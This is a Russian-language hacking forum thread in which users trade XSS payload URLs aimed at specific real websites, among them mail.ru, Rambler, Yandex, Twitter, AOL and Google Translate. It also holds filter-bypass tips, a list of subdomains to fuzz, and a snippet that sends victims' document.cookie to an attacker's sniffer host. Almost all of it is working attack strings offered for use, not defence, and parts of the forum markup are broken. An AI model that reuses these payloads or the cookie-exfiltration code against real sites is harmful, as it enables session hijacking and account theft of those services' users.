Вот ещё кучка XSS, которые я где-то выкладывал, что-то уже нерабочее:


http://rutube.ru/search.html?search=sum41&sort_by=1"><script>alert( 'XSS')</script>&category=1

http://help.rambler.ru/feedback.html?s=7715&fio="><script>alert('XSS')</script>

http://horoscopes.rambler.ru/fortune.html?sec=56576"><script>alert('XSS')</script>

http://story.travel.mail.ru/?mod=add_story&back="><script>alert(document.cooki e)</script>

http://miss.rambler.ru/srch/?sort=0&set=miss&words="><script>alert(document.co okie)</script>

http://skate.rambler.ru/popup.html?alt=</title><script>alert(document.cookie)</script>

http://www.pisem.net/download.php/?file="><script>alert('XSS')</script>

http://sub.rambler.ru/catalog/rambler/news/?login="><script>alert('XSS')</script>

http://health.rambler.ru/drugs/pharmacy.html?phid=37"><script>alert('XSS')</script>

http://foto.rambler.ru/introduce.htm...)%3C/script%3E

http://uptime.ru/downtime.php?host_id="><script>alert()</script>"

http://www.speedguide.net/read_articles.php?id="><script>alert()</script>"

http://mail.yandex.ru/r?url=javascript:alert();

Ruslan1817
05.12.2009, 12:52
http://testoteka.ukr.net/searchresults/?target=%2522%253cscript%253ealert%28document.cook ie%29%253c%2Fscript%253e

http://search.ukr.net/yandex/search.php?search_mode=ordinal&geo=11000187&PerformSearch=1&search_query=\%27%3E%3C\%27\%27%3E\%22%3E%3Cscript %3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E

Ruslan1817
12.12.2009, 16:10
http://story.travel.mail.ru/?mod=story&city_id=1543&%27%3E%3C%27%27%3E%22%3E%3Cscript%3Ealert%28/Ruslan1817/%29%3C/script%3E

Ruslan1817
19.12.2009, 18:51
http://finance.search.ua/?area='%3E%3C''%3E%22%3E%3Cscript%3Ealert(document .cookie)%3C/script%3E
http://tv.search.ua/?query=%27%3E%3C%27%27%3E%22%3E%3Cscript%3Ealert%2 8document.cookie%29%3C%2Fscript%3E
http://tv.search.ua/?day='><''>"><script>alert(document.cookie)</script>

короче там все в XSS ))

http://r.mail.kz/wssx/helpinside.wssx?Language=russian'><''>"><script>alert(/Ruslan1817/)</script>

http://r.mail.kz/wssx/helpinside.wssx
уязвимые поля :
Ваше Имя Фамилия:
Ваш e-mail:



http://top.mail.tj/index.aspx?page=1&o=hits&l=50'%3E%3C''%3E%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E

Ruslan1817
21.12.2009, 22:02
http://foto.rambler.ru/introduce.html?back='%3E%3C''%3E%22%3E%3Cscript%3E alert(document.cookie)%3C/script%3E

http://planeta.rambler.ru/community/community/?tags=4049740'%3E%3C''%3E%22%3E%3Cscript%3Ealert(d ocument.cookie)%3C/script%3E

Ruslan1817
23.12.2009, 01:18
Заходим сюда --->http://rasp.yandex.ru/widgets/route?station_from=9623562&station_to=9600215&thread=YUT376A_agent&dateForward=2009-12-22

Видем внизу
Текст:
-«Вылетаю!»
-«Встречайте!»
-написать свой текст <---- он нам и нужен

Вставляем туда ---> <IMG SRC=" javascript:alert('XSS');"> ----> жмем получить код ---> потом выбераем любую из них «Вылетаю!» , «Встречайте!» и снова жмем обратно ( где скрипт ) и вот она долгожданная "XSS" ))

Ruslan1817
23.12.2009, 22:14
http://travel.mail.ru/?mod=story&hotel_id=4334&'><''>"><script>alert(/Ruslan1817/)</script>

Ruslan1817
26.12.2009, 15:40
http://afisha.mail.ru/resto_list.html?advs=1&name=&%22%3E%3Cimg%20src=foo.png%20onerror=alert(documen t.cookie)%20/%3E

Ruslan1817
26.12.2009, 23:24
http://afisha.mail.ru/event.html?placetype=3&%22%3E%3Cimg%20src=foo.png%20onerror=alert(documen t.cookie)%20/%3E

Ruslan1817
27.12.2009, 05:54
http://google.ftpsearch.com.ua/index.php?hl=uk&inlang=ru&ie=UTF-8&q=related:www.owasp.org/index.php/DOM_Based_XSS&ie=windows-1251&q=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Mil-Net
28.12.2009, 13:27
Mail.ru

http://voip.agent.mail.ru/cgi-bin/mailrubin.dll/cards.html?inf="><script>alert('BY HACKED Mil-Net')</script>

Нашол сам недавно!
Пускаю по рукам :)

Mil-Net
28.12.2009, 16:07
Rambler.ru

http://planeta.rambler.ru/community/icq/?tags=68773422%22%3E%3Cscript%3Ealert(%27BY HACKED Mil-Net%27)%3C/script%3E%3Cnoscript%3E

brain[pillow]
28.12.2009, 17:49
Twitter - не почтовик, но надеюсь меня не побьют:

http://search.twitter.com/search?q=%26%2339%3B)%3Balert(%26%2339%3Bxek%26%23 39%3B)%3B%2F%2F

И клацаем справа на "Twet the results".

Mil-Net
28.12.2009, 18:24
Ну тогда я тоже выложу так как не нашол подходящей темы!
Магазин по продаже софта!

http://soft.qwerty.ru/search/index.php?q=%22%3E%3Cscript%3Ealert%28%27BY+HACKED +Mil-Net%27%29%3C%2Fscript%3E&s=%CD%E0%E9%F2%E8

<Cyber-punk>
31.12.2009, 17:58
Почта? Почта!
http://e-mail.ru/webmail.ok?ulogin=%22%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E

Ruslan1817
03.01.2010, 06:50
https://mailserver1.hushmail.com/hushmail/index.php?PHPSESSID=A903042B9212494D8B8F3A7EFA99F9 60

Email Address:
вводим скрипт '><script>alert(/Ruslan1817/)</script>

vitaliy_n73
03.01.2010, 21:47
http://autorambler.ru/journal/testdrives/?brand=%22%3E%3Cscript%3Ealert(/vitaliy_n73/)%3C/script%3E

vitaliy_n73
03.01.2010, 21:52
http://autorambler.ru/cars/by-brand/?brand=62&model=40&no=1%22%3E%3Cscript%3Ealert(/vitaliy_n73/)%3C/script%3E

vitaliy_n73
03.01.2010, 21:56
http://autorambler.ru/cars/by-brand/?brand=62&model=40&no=1&period=day%22%3E%3Cscript%3Ealert(/vitaliy_n73/)%3C/script%3E

W@r.N0i$e
09.01.2010, 13:16
Пассивная xss на mail.ru
https://auth.mail.ru/cgi-bin/auth?page=&post=&login_from=&Login="><SCRIPT>alert("XSS")<%2FSCRIPT>">&Domain=mail.ru&Password=yyy

kl0yn
10.01.2010, 19:09
Пассивная xss на mail.ru
https://auht.mail.ru/cgi-bin/auth?page=&post=&login_from=&Lоgin=">< SCRIPT>alert("XSS")<%2FSCRIPT>">&Domain=mail.ru&Password=yyy

Повтор!

http://forum.antichat.ru/showpost.php?p=1645042&postcount=86

Ruslan1817
18.01.2010, 07:14
Не почта, но тоже оч забавный ресурс ))

http://naked.com/index.php?s=user.credits.buyCredit&freeRegister=1&freeRegister='%3E%3C''%3E%22%3E%3Cscript%3Ealert(d ocument.cookie)%3C/script%3E

Ruslan1817
13.02.2010, 15:09
http://11x11.mail.ru/tournaments/414252/act=join&'%3E%3C''%3E%22%3E%3Cscript%3Ealert(document.cooki e)%3C/script%3E

работает тока у авторизированных ... а эт минус.

gringo60
17.02.2010, 20:17
Работает у авторизированных .

http://11x11.mail.ru/users/10000125/'%3E%3C''%3E%22%3E%3Cscript%3Ealert(document.cooki e)%3C/script%3E

mikail
17.02.2010, 20:20
http://afisha.rambler.ru/message.html?id=33028434&pg=%22%3E%3Cscript%3Ealert%28%27mikail%27%29%3C/script%3E

gringo60
17.02.2010, 20:54
http://file.qip.ru/preview.jsp?w=200%27&h=200%27&s=no&b=yes&l=javascript:alert(document.cookie);

Ruslan1817
02.03.2010, 19:39
_http://direct.yandex.ru/registered/main.KJdxxnJWRSRj8t_8.pl?&'%3E%3C''%3E%22%3E%3Cscript%3Ealert(/Ruslan1817/)%3C/script%3Ecmd=newCamp&mediaType=text&notnew=yes

Ruslan1817
06.03.2010, 23:40
http://maps.icq.com/maps/?country=RU&street=&city=%27%3E%3C%27%27%3E%22%3E%3Cscript%3Ealert%28d ocument.cookie%29%3C/script%3E

Ruslan1817
27.03.2010, 16:01
http://finance.rambler.ru/calculators/hypothec/?sum=56&years=6546&interest="><script>alert(/XSS/)</script>

Ruslan1817
19.04.2010, 08:48
http://do.ngs.ru/categories/services/poligr/sell/?&'><''>"><script>alert('Печенько хочет к маме')</script>

http://rabota.ngs.ru/resumes/search/?pageType=all&'><''>"><script>alert('Печенько хочет к маме')</script>

satana-fu
25.04.2010, 21:31
http://mail.am

http://m.mail.am/mail/util.php?func=info&sort_subject='"><script>alert();</script>


http://mirtesen.ru
http://mirtesen.ru/people/map?city=&igp=#search&<img src=s onerror=alert(document.cookie)>&&

Konqi
29.04.2010, 12:58
http://www.everyday.com

http://www.register.everyday.com/reg_step.phtml?REG_TEXT_FIRST_NAME="><script>alert('0_o')</script>

!!!SpartakFan!!!
06.05.2010, 02:45
http://list.ngs.ru/page.php?do='search&bool=and&substring=0&mh=10&query="><script>alert(document.cookie)</script>

Ruslan1817
06.05.2010, 10:57
http://en.securitylab.ru/nvd/index.php?'arrFilter_ff%5BSECTION_ID%5D=&arrFilter_ff%5BSEARCHABLE_CONTENT%'>"><script>alert(document.cookie)</script>

Ruslan1817
12.05.2010, 19:57
Может кому будет интересно
http://moscow.megafon.ru/buy/pay/pay/?city=985368&'metro=537480'>"><script>alert(document.cookie)</script>
http://search.twitter.com/search?q=cool+filter%3Alinks'>"><script>alert(document.cookie)</script>

M_script_
13.05.2010, 09:47
Может кому будет интересно
Очень даже интересно :)
Особенно в таком виде:
http://search.twitter.com/search?q=%66%69%6C%74%65%72%3A%6C%69%6E%6B%73%27%3 E%22%3E%3C%73%63%72%69%70%74%3E%64%6F%63%75%6D%65% 6E%74%2E%6C%6F%63%61%74%69%6F%6E%3D%27http://google.com%27%3C%2F%73%63%72%69%70%74%3E

Ruslan1817
20.05.2010, 01:13
http://forum2.km.ru/keyboard.aspx?id=</script><script>alert(document.cookie)</script>

http://vkrugudruzei.ru/search/interest.asp?iname=%F2%E0%ED%F6%FB&igroup=&iequal=1>"><script>alert(document.cookie)</script>

life_glider
23.05.2010, 18:16
liveinternet
<body onload="document.UsrSrchImportFormSrch.submit();">
<form id="UsrSrchImportFormSrch" action="http://www.liveinternet.ru/importmail.php?cmd=getbook_icq" method="post" name="UsrSrchImportFormSrch" onKeyDown="checkKey('UsrSrchImportFormSrch');">
<input class="SrvBorderBlue" type="text" name="addicqs" value='"><script>alert(/Found by life_glider/);</script> <br "' />
<input class="Hi" type="submit" value="Искать!" />
</form>
</body>

life_glider
24.05.2010, 16:24
http://mbox.i.ua/list/INBOX/?fMask=0&fReq=0&sort=2"><script>alert("FOUND BY LIFE-GLIDER")</script><br%20tr="&p=0&_rand=1274703519

Ruslan1817
25.05.2010, 01:06
http://job.ukr.net/vacancy/?AdvancedSearch=0&ShowSearchResults=1&event=&sd=-2&Keywords="><img src=foo.png onerror=alert('kusto') />

BlackFan
11.06.2010, 18:35
http://maps.mail.ru

В строке поиска:
' onMouseOver='alert(1)'>
и "Найти"



kards.qip.ru
В любых комментариях в login/pass вставляем
"><img src='.' onerror='alert()'>
И нажимаем "Добавить комментарий"

BlackFan
05.07.2010, 17:49
http://rabota.mail.ru


http://rabota.mail.ru/vac_search/?go=1&city=1'%3Balert(1)%3Ba='

crackmail: не пашет.

пффф, уже пофиксили

BluR
24.08.2010, 13:21
money.yandex.ru

https://money.yandex.ru/feedback/?themeTitle=deception&userTheme=1//-->alert(document.cookie)

satana666
15.09.2010, 16:38
rambler.ru

Вроде ещё не выкладывали.


http://horoscopes.rambler.ru/names.html?words=">alert('XSS')



http://dating.meta.ua/search.php?action=search&min_age=">alert(/XSS/)



http://index.online.ua/?cx=&q=">alert('XSS')

ukr.net

Не знаю выкладывали или нет, гугл не ответил точно.


http://freemail.ukr.net/q/reg?name=">alert('XSS')



http://kino.ukr.net/subscribe/email%3D%22%3E%3Cscript%3Ealert('XSS')%3C%2Fscript %3E

Unknown
01.10.2010, 21:46
mail.ru

Парочка пассивных xss на форумах mail.ru


http://forum.lady.mail.ru/topic.html?fid=22&tid=28428&sub=6964&old_pg=&old_id=alert("xss")



http://forum.health.mail.ru/topic.html?fid=114&tid=2137&sub=%3Cscript%3Ealert(%22xss%22)%3C/script%3E

satana666
19.10.2010, 08:38
Пасcивка на mail.ru


http://starlook.lady.mail.ru/commented?">alert('XSS')

Вот только в alert(document.cookie) точка заменяется на _

Это можно как-нибудь обойти?

Ruslan1817
19.10.2010, 22:48
Пасcивка на mail.ru

http://starlook.lady.mail.ru/commented?">alert('XSS')

Вот только в alert(document.cookie) точка заменяется на _
Это можно как-нибудь обойти?


так будет лучше.


http://starlook.lady.mail.ru/commented?period=month">alert(document.cookie)

Зря выложил ее, завтра уже будет закрыта.

Ruslan1817
23.10.2010, 23:19
http://help.aol.com/help/microsites/searchEntry.do?&searchString=">alert(document.cookie)

Ruslan1817
04.11.2010, 17:24
http://auth.opera.com/service/oauth/authorize?oauth_token=RTMG0hYfEyPQcAltkyZIdmAXHaJy Tf9X">alert(document.cookie)

Konqi
14.11.2010, 01:13
хотья это не почтовик, но думаю модеры простят меня

http://www.nato.int/cps/en/natolive/search.htm

">alert('ololo')

PR-9

тИЦ- 1100

Ruslan1817
15.11.2010, 19:45
http://maps.google.com/maps?ll=55.354135,40.297852&spn=42.876902,89.560547&z=4&layer=t&hl=ru

уязвимо поле - Задайте местоположение по умолчанию

поймай меня

~d0s~
16.11.2010, 14:25
снова lady.mail.ru , такой тут еще не было вроде


http://lady.mail.ru/product/?letter=1alert(123)

~d0s~
17.11.2010, 16:50
kids.rambler.ru


http://kids.rambler.ru/faq/271063/tns-counter.ru?p=1alert('~d0s~')

~d0s~
19.11.2010, 16:25
tv.ukr.net


http://tv.ukr.net/?scn=tv&sb=1'>alert(1)

Там почти весь сайт,видимо хсс они за багу не считают

~d0s~
21.11.2010, 01:52
rabota.ngs.ru


http://rabota.ngs.ru/vacancies/search/?other2=yes&rubrics%5B%5D=1">alert(1)

~d0s~
22.11.2010, 17:07
autorambler.ru


http://autorambler.ru/bz/pdd/pddonline/?type=1//-->alert(123)

~d0s~
22.11.2010, 18:41
realty.mail.ru


http://realty.mail.ru/detail/001667605.html

Добавляем в куки имя search_res а значение ставим ">alert(123)

Обновляем страничку,любуемся аллертом

satana666
22.11.2010, 22:31
В поле "Электронная почта"

">alert(document.cookie)


http://avito.ru.msn.com/additem



http://avito.ru.msn.com/shops?name="'>alert(document.cookie)

Kusto
22.11.2010, 22:38
realty.
mail.ru

http://realty.mail.ru/detail/001667605.html

Добавляем в куки имя search_res а значение ставим ">alert(123)
Обновляем страничку,любуемся аллертом




В поле "Электронная почта"
">alert(document.cookie)

http://avito.ru.msn.com/additem



ребят я конечно репу подниму, но скажу что такие уязвимости- бесполезны: цель ксс- атаки- выполнение произвольного кода на стороне клиента жертвы и как-бы просить его подправить куки, либо вписать в поле емайла наш ядовитый код- как-то не по феншую....

P.S. To satana666 - правильное исправление поста, второй ссылкой уже можно добиться результата

~d0s~
23.11.2010, 21:00
cards.rambler.ru


http://cards.rambler.ru/author.html?author=d0s&offset=1">alert('true')

Ruslan1817
30.11.2010, 17:49
http://szukaj.onet.pl/query.html?qt=777&lr=Polska">alert(document.cookie)

Unknown
01.12.2010, 19:44
http://wap.ks.korrespondent.net/search.php?keyword=>alert('Speciall y for the Antichat')


ТИЦ 7200 PR 7
Посещаемость очень высокая.

~d0s~
06.12.2010, 03:09
job.gala.net


http://job.gala.net/cgi-bin/faq.cgi?do=add-question&branch_id=21&razdel_id=21&email=">alert('xz che za')

~d0s~
09.12.2010, 17:51
meta.ua


http://meta.ua/feeds/weather.asp?city=alert(document.cookie)

Вчера там была и в поиске,не успел выложить,сегодня прихожу уже не работает,значит большая вероятность что и эту пофиксят скоро

~d0s~
12.12.2010, 01:50
game.km.ru


http://game.km.ru/magazin/lenta.asp?idRubr=1&order=">alert('d0s')&search=xD

~d0s~
13.12.2010, 15:35
wap.afisha.mail.ru


http://wap.afisha.mail.ru/event.html/">alert(document.cookie)

upd:Кто-то слил им

На днях еще на мейле выложу несколько.

~d0s~
15.12.2010, 19:42
wap.rambler.ru


http://wap.rambler.ru/geo/?back=">alert(123)

Ruslan1817
15.12.2010, 20:09
wap.afisha.
mail.ru

http://wap.afisha.mail.ru/event.html/">alert(document.cookie)

upd:Кто-то слил им
На днях еще на мейле выложу несколько.


Все баги быстро закрывают из-за того, что сотрудника майла отслеживают такие темы.

~d0s~
18.12.2010, 16:15
teentoday.mail.everyone.net/


http://teentoday.mail.everyone.net/email/scripts/loginuser.pl/">alert(123)

Такого почтовика не слышал,нарыл его в листинге забугорных почтовиков мейла,если что-то не то удалите

satana-fu
19.12.2010, 09:02
XSS рабочая и в рабочем виде, а вот если догадаетесь почему она у вас не заработала или заработала, то вы хэккеры))))


http://market.yandex.ru/model.xml?modelid=4741931&hid=90617#">

eclipse
20.12.2010, 17:14
http://my-mail.co.il


http://my-mail.co.il/wm/mail/login2.html?user=">alert('XSS')

~d0s~
21.12.2010, 16:08
mail2000.ru


http://mail2000.ru/ya.php?query=">alert(document.cookie)

eclipse
22.12.2010, 21:50
http://www.virtualjerusalem.com/news.php?Itemid=">alert(/xss/)

~d0s~
23.12.2010, 23:01
smallbusiness.aol.com


http://smallbusiness.aol.com/search/?q=alert(document.cookie)

eclipse
24.12.2010, 11:19
lycos.com


https://registration.lycos.com/forgot.php/%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

mail.infobox.ru


http://mail.infobox.ru/redirect.php?login_username=">alert(/xss/)&secretkey=">alert(/xss/)&js_autodetect_results=1&just_logged_in=1&lng=ru_RU&lng=ru_RU

~d0s~
27.12.2010, 00:11
music.aol.com


http://music.aol.com/pictures/search/?cat=photo&query=alert(document.cookie)

~d0s~
16.01.2011, 22:25
xakep.ru


http://xakep.ru/local/search/result.asp?tosearch=alert(document.cookie)

Unknown
17.01.2011, 22:37
aboutmail.ru

http://www.aboutmail.ru/?option=com_performs&formid=1

уязвимые поля:

Ваше имя: *

Ваш EMail: *

Заголовок: *

//добавь пример.

satana-fu
22.04.2011, 03:11
не почтовый сервис, но XSS няшка

[QUOTE="None"]
http://www.vaytube.com/search?search_query='">

Sevak
26.04.2011, 17:22
Mail.am: PR - 4



http://realty.mail.am/index.php?page=view_2&tp_tp=\%22%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E&return=0&realty

Sevak
30.04.2011, 14:41
Mail.ru

Mail.ru​


http://zhuki.mail.ru/?register=2&form[nick]=%27onmouseover=%27alert%28/xss/%29;%27%20name=%272



после перехода на ссылку, наведите мышуку на радиокнопку

Ruslan1817
12.10.2011, 23:37
http://www.hackzone.ru/memb/?a=list&sort=2">alert(document.cookie)

Transformer
16.10.2011, 09:02
http://deti.mail.ru/search/?key_find=%22%3E%27%2B%2F-%2F%2Balert%28777%29%2F%2F%3E

Finki
20.11.2011, 18:26
http://minigames.mail.ru/user/login_form

Yязвимые поля:

Uмя: ">alert('xss');

Дядька
21.11.2011, 18:13
http://i-email.ru/signup/

Уязвимы поля "Имя", "Фамилия", "Телефон"

">alert(/XSS/)

Дядька
21.11.2011, 18:38
http://e-mail.ua/login/

Уязвимо поле "Логин"

">alert(/XSS/)

Finki
24.11.2011, 13:31
http://autos.aol.com/cars-Buick-Enclave-2012-foo__bla-xss-6619">alert%2528document.cookie%2529/best-deal/

Дядька
25.11.2011, 00:18
http://minigames.mail.ru/#game&ident=durak

Уязвимо поле "Имя"

">alert(/XSS/)

Unknown
28.11.2011, 15:01
http://horoscopes.rambler.ru/psychology.html?id=1174592&sec=1174580">alert('XSS')

kravch_v
05.01.2012, 00:57
Крупнейший русскоязычный битторрент трекер.


http://pm.rutracker.org/forum/privmsg.php?mode=post">alert(document.cookie)

kravch_v
05.01.2012, 02:43
Рамблер.


http://horoscopes.rambler.ru/names.html?rubric=0&words=test">alert('xss')



http://help.rambler.ru/1/search/avia/?set=help&query=111">alert('xss')



http://planeta.rambler.ru/abuse.html?url=">alert('xss')

M_script
05.01.2012, 06:07
Google XSS!




Кибер, сессию и куки спереть реально.


Было бы интересно почитать, как это сделать. JS выполняется даже не на поддомене, а на googleusercontent.com. Кроме опен-редиректа и фишинга юзеров гугла не могу придумать варианты использования этого бага.

Ereee
08.01.2012, 13:03
Tumblr - сервис микроблоггинга​тИЦ 3600 PR 8


https://www.tumblr.com/register/join_tumblr?referring_blog=usagov%22%3E%3Cscript%3 Ealert()%3C/script%3E

P.S. Достаточно известный сервис, можно юзнуть

--

USA Government​

тИЦ 350 PR 10


http://search.usa.gov/search/news?affiliate=usa.govblog&locale=en&m=false&query=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&tbs=h

P.S. Тут есть ПП, поэтому может кому понадобится.

Unknown
19.01.2012, 05:54
Ещё один msn.com


http://ringtones.nl.msn.com/games.php?rtch=1&rtlo=41992"/>

M_script
19.01.2012, 09:58
Ещё один msn.com

http://ringtones.nl.
msn.com
/games.php?rtch=1&rtlo=41992
"/>


Это не обычная пассивка, а DOM-based, поэтому защита от XSS в браузерах на нее не сработает.

Со страницы вызывается скрипт http://www.ringtonio.nl/javagames/?..., уязвимый к XSS в реферере.

Данные из реферера выводятся в двух местах:


d.writeln('window.open (bd+"/send/javagame?id="+nr+"&clx=1&rths=0&brpc=&rtlo=
41992\"/>
","sendpop","toolbar=no,location=no,directories=no,status=yes,m enubar=no,scrollbars=yes,resizable=no,copyhistory= no,width=600,height=450,screenX=0,screenY=0,top=0, left=0");');




d.writeln('[/COLOR][/B]
">');


Видно, что кавычки экранируются. Но это происходит внутри строки в функции вывода, поэтому на странице экранирования не будет.

В примере используется второй вариант вывода - внутри тега input. Но зачем лишние символы?

http://ringtones.nl.msn.com/games.php?rtch=1&rtlo=41992">[/COLOR]

Без них все работает нормально:

[B]http://ringtones.nl.msn.com/games.php?rtlo=">

thrust
19.01.2012, 19:04
liveinternet.ru


http://www.liveinternet.ru/tests.php?cmd=show&session_id=7f00c824a22d703516ea5e7e94fc4a1b&order=%22%3E%3Cscript%3Ealert%28document.cookie%29 %3C/script%3E



http://www.liveinternet.ru/search/?q=">alert(document.cookie)

Ereee
21.01.2012, 21:57
[CODE]
http://muziek.downloaden.nl.msn.com/artist.php?artist=2pac">alert(document.cookie)

M_script
22.01.2012, 18:07
P.S. Xss с mandriva пашет только в Opera+IE.


Продолжаем знакомство с XSS.

Тема урока - "почему в одном браузере работает, а в другом нет"

http://store.mandriva.com/simple_popup_image.php?img='>alert()alert(1)= 8 тоже).

[B]"alert()" вырезается фильтром и XSS не срабатывает. Чтобы это увидеть, можно в окне браузера нажать правую кнопку мыши и выбрать "Inspect element"

На странице код внедряется внутри тега img.





У этого тега есть события onload и onerror, поэтому нет смысла его закрывать и использовать тег script. Достаточно вставить такой код:





http://store.mandriva.com/simple_popup_image.php?img=[COLOR="Green"]'+onerror=alert(1)+

Этот вариант работает в IE (до 8 версии), опере, фф, но все так же не работает в хроме. Фильтр вырезает "=alert(1)".

Попробуем сделать так:

http://store.mandriva.com/simple_popup_image.php?img='onerror=alert(1);/

Код "alert(1);/" содержит ошибку синтаксиса JS и не будет выполняться браузером, поэтому фильтровать его (казалось бы) необязательно. Но посмотрим внимательнее на ответ сервера:





Так как после onerror= нет открывающей кавычки, весь код до закрытия тега будет считаться значением onerror. Браузер этот код видит так:





"alert(1);/'/" уже не содержит ошибок синтаксиса и выполняется хромом в обход фильтра.

Окончательный вариант:

http://store.mandriva.com/simple_popup_image.php?img='onerror=alert(1);/

Не работает в IE >= 8

Unknown
23.01.2012, 21:06
http://techguru.aol.com/?ncid=txtlnkusstor00000094">alert(String.fromCharCode(88,83,83,32,65,78,84,73, 67,72,65,84))

kravch_v
26.01.2012, 21:25
LiveInternet


http://www.liveinternet.ru/jsearch/?s=">alert('xss')

Ereee
30.01.2012, 16:19
Lycos Mail (http://www.mail.lycos.com/)​тИЦ 100

PR 7


http://games.lycos.com/board-game/gacopyrze-vs_-wilkolkialert(document.cookie)/

kravch_v
02.02.2012, 19:06
Mail.ru


http://apps.hi-tech.mail.ru/contest/add/?comment=&Domain=mail.ru&Login=&Password=&platform=">alert('xss')

M_script
04.02.2012, 10:27
kravch_v, не надо юзать HTML, если XSS внутри JS-кода.

http://apps.hi-tech.mail.ru/contest/add/?platform='%3Balert('xss')%3Ba='

kravch_v
04.02.2012, 19:44
M_script, спасибо!

Google XSS


http://translate.google.ru/translate?sl=en&tl=ru&js=n&prev=_t&hl=ru&ie=UTF-8&layout=2&eotf=1&u=http://ссылка_на_уязвимый_код

Пример:


http://translate.google.ru/translate?sl=en&tl=ru&js=n&prev=_t&hl=ru&ie=UTF-8&layout=2&eotf=1&u=http://exploit-db.ru/googlexss/

Для кражи кук используйте следующий код:


img = new Image(); img.src = "http://адрес_сниффера.gif?"+document.cookie;

// M_script, то сообщение кто-то удалил. Печеньки я каким-то образом крал. Пассивки на ютубе нету.

M_script
04.02.2012, 20:12
kravch_v, ты в начале января уже выкладывал эту XSSку на гугле. Там выполнение JS-кода происходит не на google.ru(com), а на googleusercontent.com. Соответственно, куки будут с домена googleusercontent.com. Как их можно использовать на практике?

upd:


Печеньки я каким-то образом крал


Куки на googleusercontent.com есть и украсть их можно, но в них не содержится сессии google.com

kravch_v
05.02.2012, 01:22
Mail.Ru - Недостаточная фильтрация в cookie

Уязвимый код (cookie):


Mpop=test:test:test@test.ru">alert('xss');

Заходим на w2.dwar.mail.ru и код успешно выполняется.

Unknown
05.02.2012, 13:02
Почта Укр.нет (http://kino.ukr.net)

[HTML]
http://kino.ukr.net/search?query="+onMouseover=alert(document.cookie)+">+

[/QUOTE]
" if author else f"




По сути можно поставить onerror и onload, нужно только подумать как .

M_script
05.02.2012, 13:56
[QUOTE="Unix@"]
http://kino.ukr.net/search?query="+onMouseover=alert(document.cookie)+">++

kravch_v
05.02.2012, 16:09
[CODE]
http://kino.ukr.net/persons/search?query=">alert('xss')

Также есть активная XSS на самой странице видео.

Уязвимое место "теги"

kravch_v
05.02.2012, 21:31
LiveInternet.Ru


POST Запрос


http://liveinternet.ru/importmail.php?cmd=getbook_icq&addicqs=111">alert(/xss/)





http://liveinternet.ru/flashes.php?id=58259&page=0&filter=">alert('xss')





http://liveinternet.ru/flashes.php?id=629&page=1&userid=&cardinfo=">alert('xss')





http://litube.li.ru/yandex/?search_string=111">alert('xss')

kravch_v
09.02.2012, 19:59
Ya.ru

Уязвимый код:




1) Заходим на clubs.ya.ru

2) Жмякаем на "Записать мысль"

3) Пишем в "HTML-Режиме" уязвимый код и переходим в режим "с оформлением"

XSS Выполняется.

M_script
10.02.2012, 00:21
3) Пишем в "HTML-Режиме" уязвимый код и переходим в режим "с оформлением"
XSS Выполняется.


Это не пассивка, а DOM-based

kravch_v
10.02.2012, 01:11
Это не пассивка, а DOM-based


Но тем не менее.

Еще видел одну маленькую дырочку, но раскрутить так и не смог. (Фильтруются , и еще несколько HTML-Тегов).

,
- выводятся.

Always
10.02.2012, 14:41
http://pulse.mts.ru/search?q=">alert(document.cookie)

jacklndn
22.02.2012, 18:33
На мaил есть рабочая хcс?

Мoгу пoменяться на oбхoд 704 oшибки

Unknown
26.02.2012, 10:56
Xss на mail.ru

Работает не во всех платформах OC на Windows 7 не пашет.


http://search.enc.mail.ru/search_enc?q=">

jacklndn
26.02.2012, 12:03
Xss на mail.ru
Работает не во всех платформах OC на Windows 7 не пашет.


на xp тоже не пашет

Unknown
26.02.2012, 13:16
xss mail.ru

Не знаю почему у меня работает,честно.

http://imglink.ru/thumbnails/26-02-12/a51e51e4e431297ef90aa24de037d742.jpg (http://imglink.ru/show-image.php?id=37d38dfc564a1bd3aff42782f68d1f73)

GoodGoogle
26.02.2012, 13:41
Не знаю почему у меня работает,честно.
http://imglink.ru/thumbnails/26-02-12/a51e51e4e431297ef90aa24de037d742.jpg (http://imglink.ru/show-image.php?id=37d38dfc564a1bd3aff42782f68d1f73)


Браузер обнови) попробуй.

Unknown
26.02.2012, 15:42
Список 403 доменов на мейл.ру

если у кого есть желание могут поФаззить на скрипты

там дырявые есть 100%, парочку пасивок на прошлой неделе снял


http://aj.mail.ru
http://bs.mail.ru
http://dn.mail.ru
http://ff.mail.ru
http://fx.mail.ru
http://js.mail.ru
http://kp.mail.ru
http://ok.mail.ru
http://r1.mail.ru
http://r2.mail.ru
http://r3.mail.ru

Unknown
06.03.2012, 12:28
Xss на Mail.ru

1. Заходим на страницу http://webagent.mail.ru/r/webagent/popup.html?branch=redesign-rc6.

2. Добавить Контакт

3.


"


4.Вставляем этот код в любое место

5.Нажимаем найти

M_script
06.03.2012, 14:01
Unix@, как эту XSS можно использовать на практике?

mr.Penguin
11.03.2012, 03:00
@bigmir.net

Тип уязвимости: Активная XSS

Находится в сервисе "Дневники".

Где найти?

Мой дневник => Заметки => Добавить заметку​Уязвимое поле:

Теги​Пример:

alert('xss')​

Unknown
14.03.2012, 13:48
XSS на Mail.ru

Работает только у авторизованных.


http://moto.mail.ru/login.html?Page=javascript:alert('xss');


Нажать кнопкуПродолжить

mr.Penguin
28.03.2012, 02:47
http://vashdom.tut.by/search/?search=alert('xss')

Unknown
30.03.2012, 14:33
TUT.by

Пассивка TUT.by


http://slovari.tut.by/index.php?skeyword=">alert(0)">alert(0)

Unknown
31.03.2012, 00:38
icq.com

validate.icq.com/icq/validate.html?uid=1&sid=23">alert('XSS')&lang=en

adobe.com

store1.adobe.com/cfusion/store/html/index.cfm?store=OLS-US&event=searchFonts&type=">&code=adobe&cat=classification

eclipse
31.03.2012, 12:02
Пассивка на ачате))

PR 5 | GI - 4 980 000 | CY 240 | 243 000

Античат конечно не почтовый сервис, но я думаю меня простят)))

http://video.antichat.ru/video/Номер видео/

Post запрос


author=">[XSS] или &comment=">[XSS]


Там еще защита от CSRF стоит, так что для приведения в действие надо использовать технику считывания токена, (ссылка (https://antichat.live/showthread.php/p/2665544/) )

M_script
31.03.2012, 12:48
Там еще защита от CSRF стоит, так что для приведения в действие надо использовать технику считывания токена, (
ссылка (https://antichat.live/showthread.php/p/2665544/)
)


